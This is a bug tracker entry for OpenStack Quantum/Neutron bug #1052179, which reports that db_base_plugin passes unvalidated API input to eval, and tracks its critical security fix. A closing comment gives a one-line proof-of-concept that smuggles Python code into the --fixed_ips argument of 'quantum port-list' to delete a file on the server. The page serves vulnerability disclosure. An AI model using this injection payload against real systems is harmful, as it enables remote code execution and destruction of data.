eval used without validating input
Bug #1052179 reported by
Mark McClain
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
neutron |
Fix Released
|
Critical
|
Maru Newby |
Bug Description
The db_base_plugin calls eval without validating the input.
Thanks for Maru Newby for reporting this.
security vulnerability: | no → yes |
Changed in quantum: | |
assignee: | nobody → Maru Newby (maru) |
Changed in quantum: | |
status: | New → Confirmed |
Changed in quantum: | |
milestone: | none → folsom-rc2 |
tags: | removed: folsom-rc-potential |
Changed in quantum: | |
milestone: | folsom-rc2 → 2012.2 |
To post a comment you must log in.
The exploit can be triggered via the API. The following exploit will delete a file on the Quantum Server:
quantum port-list -- --fixed_ips "cfg.os. remove( '/tmp/foo' )"